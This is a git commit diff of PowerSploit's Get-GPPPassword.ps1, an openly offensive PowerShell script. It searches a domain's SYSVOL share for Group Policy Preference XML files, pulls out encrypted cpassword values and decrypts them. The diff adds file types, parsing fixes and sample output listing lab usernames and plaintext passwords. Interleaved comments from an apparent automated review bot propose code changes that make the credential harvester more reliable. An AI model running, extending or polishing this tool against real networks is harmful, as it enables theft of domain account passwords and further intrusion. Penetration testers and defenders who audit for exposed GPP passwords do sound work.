author | clymb3r <bialek.joseph@gmail.com> | 2014-04-16 21:02:50 -0700 |
committer | clymb3r <bialek.joseph@gmail.com> | 2014-04-16 21:02:50 -0700 |
commit | b783b459c12112509a733253df9f5935e104200c (patch) | |
tree | e58bce1f7d2f2584d1426262cc609f153d774e51 /Exfiltration/Get-GPPPassword.ps1 | |
parent | 47b90647c11cb4956c735cfa47628dc7dcb03bb6 (diff) | |
parent | 946328cf9e6d6c60eca2bb9d71a38e210c1c3b6c (diff) | |
Merge branch 'master' of https://github.com/mattifestation/PowerSploit
Conflicts:
Recon/Get-ComputerDetails.ps1
Recon/Recon.psd1
Diffstat (limited to 'Exfiltration/Get-GPPPassword.ps1')
-rw-r--r-- | Exfiltration/Get-GPPPassword.ps1 | 209 |
1 files changed, 148 insertions, 61 deletions
diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 7dbd23d..ea87de4 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -1,4 +1,4 @@ -function Get-GPPPassword { +function Get-GPPPassword { <# .SYNOPSIS @@ -9,6 +9,7 @@ License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None + Version: 2.4.2 .DESCRIPTION @@ -16,7 +17,43 @@ .EXAMPLE - Get-GPPPassword + PS C:\> Get-GPPPassword + + NewName : [BLANK] + Changed : {2014-02-21 05:28:53} + Passwords : {password12} + UserNames : {test1} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml + + NewName : {mspresenters} + Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} + Passwords : {Recycling*3ftw!, password123, password1234} + UserNames : {Administrator (built-in), DummyAccount, dummy2} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml + + NewName : [BLANK] + Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} + Passwords : {password, password1234$} + UserNames : {administrator, admin} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml + + NewName : [BLANK] + Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} + Passwords : {password, read123} + UserNames : {DEMO\Administrator, admin} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml + +.EXAMPLE + + PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq + + password + password12 + password123 + password1234 + password1234$ + read123 + Recycling*3ftw! .LINK 
@@ -29,8 +66,12 @@ [CmdletBinding()] Param () + #Some XML issues between versions + Set-StrictMode -Version 2 + #define helper function that decodes and decrypts password function Get-DecryptedCpassword { + [CmdletBinding()] Param ( [string] $Cpassword ) @@ -38,7 +79,12 @@ try { #Append appropriate padding based on string length $Mod = ($Cpassword.length % 4) - if ($Mod -ne 0) {$Cpassword += ('=' * (4 - $Mod))} + + switch ($Mod) { + '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)} + '2' {$Cpassword += ('=' * (4 - $Mod))} + '3' {$Cpassword += ('=' * (4 - $Mod))} + } $Base64Decoded = [Convert]::FromBase64String($Cpassword) 
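Review bot: The new `Set-StrictMode -Version 2` line is explained only by `#Some XML issues between versions`, which does not tell a reader what strict mode changes or why it is wanted here. Strict mode 2 turns references to uninitialized variables and to non-existent object properties into terminating errors, and because it is set inside the function it applies to this function's scope and the nested helpers, not to the caller's session; presumably that is why attribute reads elsewhere in this commit go through Select-Xml XPath, which returns nothing for an absent attribute instead of raising a property-lookup error. I would replace the comment with `# Strict mode 2: uninitialized variables and missing properties become errors (scope: this function and its nested helpers). XML attributes are therefore read via XPath, which yields nothing for an absent attribute instead of throwing.` The enclosing Get-GPPPassword body continues outside this hunk.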
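Review bot: The new `'1'` arm of the padding `switch` silently drops the last character of `$Cpassword` with no comment, and that is a different action from the other two arms, which pad; a reader has to know that a Base64 string whose length is 1 mod 4 cannot be valid under any padding to see why truncation is chosen. I would put `# length ≡ 1 (mod 4) is never valid Base64, so padding cannot fix it; drop the trailing character (assumed to be a stray one) instead` on the `'1'` line. The labels are string literals compared against the integer `$Mod`; this works because PowerShell converts the right-hand side to the left-hand type, but `1`, `2`, `3` would state the intent directly, and the identical `'2'` and `'3'` arms could share one comment noting that both pad to a multiple of four. Get-DecryptedCpassword's body continues past the end of this hunk.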
@@ -60,78 +106,119 @@ catch {Write-Error $Error[0]} } - #ensure that machine is domain joined and script is running as a domain account - if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) - { - throw 'Machine is not joined to a domain.' - } - - #discover potential files containing passwords ; not complaining in case of denied access to a directory - $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml' + #define helper function to parse fields from xml files + function Get-GPPInnerFields { + [CmdletBinding()] + Param ( + $File + ) - if ( -not $XMlFiles ) - { - throw 'No files containing encrypted passwords found.' - } - - foreach ($File in $XMLFiles) { - try { - $Filename = $File.Name - $Filepath = $File.VersionInfo.FileName - - #put filename in $XmlFile + + $Filename = Split-Path $File -Leaf [xml] $Xml = Get-Content ($File) - #declare blank variables - $Cpassword = '' - $UserName = '' - $NewName = '' - $Changed = '' + #declare empty arrays + $Cpassword = @() + $UserName = @() + $NewName = @() + $Changed = @() + $Password = @() - switch ($Filename) { + #check for password field + if ($Xml.innerxml -like "*cpassword*"){ + + Write-Verbose "Potential password in $File" + + switch ($Filename) { - 'Groups.xml' { - $Cpassword = $Xml.Groups.User.Properties.cpassword - $UserName = $Xml.Groups.User.Properties.userName - $NewName = $Xml.Groups.User.Properties.newName - $Changed = $Xml.Groups.User.changed - } + 'Groups.xml' { + $Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object 
{$_.Value} + $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } - 'Services.xml' { - $Cpassword = $Xml.NTServices.NTService.Properties.cpassword - $UserName = $Xml.NTServices.NTService.Properties.accountName - $Changed = $Xml.NTServices.NTService.changed - } + 'Services.xml' { + $Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } - 'Scheduledtasks.xml' { - $Cpassword = $Xml.ScheduledTasks.Task.Properties.cpassword - $UserName = $Xml.ScheduledTasks.Task.Properties.runAs - $Changed = $Xml.ScheduledTasks.Task.changed - } + 'Scheduledtasks.xml' { + $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } - 'DataSources.xml' { - $Cpassword = $Xml.DataSources.DataSource.Properties.cpassword - $UserName = $Xml.DataSources.DataSource.Properties.username - $Changed = $Xml.DataSources.DataSource.changed + 'DataSources.xml' { + $Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } + + 
'Printers.xml' { + $Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } + + 'Drives.xml' { + $Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} + } } - } - - if ($Cpassword) {$Password = Get-DecryptedCpassword $Cpassword} - - else {Write-Verbose "No encrypted passwords found in $Filepath"} - + } + + foreach ($Pass in $Cpassword) { + Write-Verbose "Decrypting $Pass" + $DecryptedPassword = Get-DecryptedCpassword $Pass + Write-Verbose "Decrypted a password of $DecryptedPassword" + #append any new passwords to array + $Password += , $DecryptedPassword + } + + #put [BLANK] in variables + if (!($Password)) {$Password = '[BLANK]'} + if (!($UserName)) {$UserName = '[BLANK]'} + if (!($Changed)) {$Changed = '[BLANK]'} + if (!($NewName)) {$NewName = '[BLANK]'} + #Create custom object to output results - $ObjectProperties = @{'Password' = $Password; - 'UserName' = $UserName; + $ObjectProperties = @{'Passwords' = $Password; + 'UserNames' = $UserName; 'Changed' = $Changed; - 'NewName' = $NewName - 'File' = $Filepath} + 'NewName' = $NewName; + 'File' = $File} $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties - Write-Output $ResultsObject + Write-Verbose "The password is between {} and may be more than one value." 
+ if ($ResultsObject) {Return $ResultsObject} + } + + catch {Write-Error $Error[0]} + } + + try { + #ensure that machine is domain joined and script is running as a domain account + if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) { + throw 'Machine is not a domain member or User is not a member of the domain.' + } + + #discover potential files containing passwords ; not complaining in case of denied access to a directory + Write-Verbose 'Searching the DC. This could take a while.' + $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' + + if ( -not $XMlFiles ) {throw 'No preference files found.'} + + Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords." + + foreach ($File in $XMLFiles) { + $Result = (Get-GppInnerFields $File.Fullname) + Write-Output $Result } - - catch {Write-Error $Error[0]} } + + catch {Write-Error $Error[0]} } |
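Review bot: In Get-GPPInnerFields the `'Groups.xml'` arm (and the other file-type arms) fills `$Cpassword`, `$UserName`, `$NewName` and `$Changed` from four independent XPath queries, so the output properties are parallel arrays whose indices only line up when every `User` element carries every attribute; the commit's own example output shows the problem, listing three UserNames and three Passwords for Groups.xml against a single NewName, so a reader cannot tell which account that NewName belongs to. One record per element avoids this: select the `/Groups/User` nodes once and read each attribute from the node, using `GetAttribute`, which returns an empty string for a missing attribute, so every array grows by one entry per element. The other arms would follow the same pattern with their own element paths; the `[BLANK]` substitution below would then need to treat an all-empty array as blank as well. The same point applies to the `'Services.xml'`, `'Scheduledtasks.xml'`, `'DataSources.xml'`, `'Printers.xml'` and `'Drives.xml'` arms.
```powershell
'Groups.xml' {
    # one pass per User element keeps the four arrays index-aligned even when an attribute is absent
    foreach ($Node in ($Xml | Select-Xml "/Groups/User" | Select-Object -Expand Node)) {
        $Cpassword += , $Node.Properties.GetAttribute('cpassword')
        $UserName  += , $Node.Properties.GetAttribute('userName')
        $NewName   += , $Node.Properties.GetAttribute('newName')   # '' when the attribute is missing
        $Changed   += , $Node.GetAttribute('changed')
    }
}
# … unchanged: remaining file-type arms, decryption loop, [BLANK] substitution, result object …
```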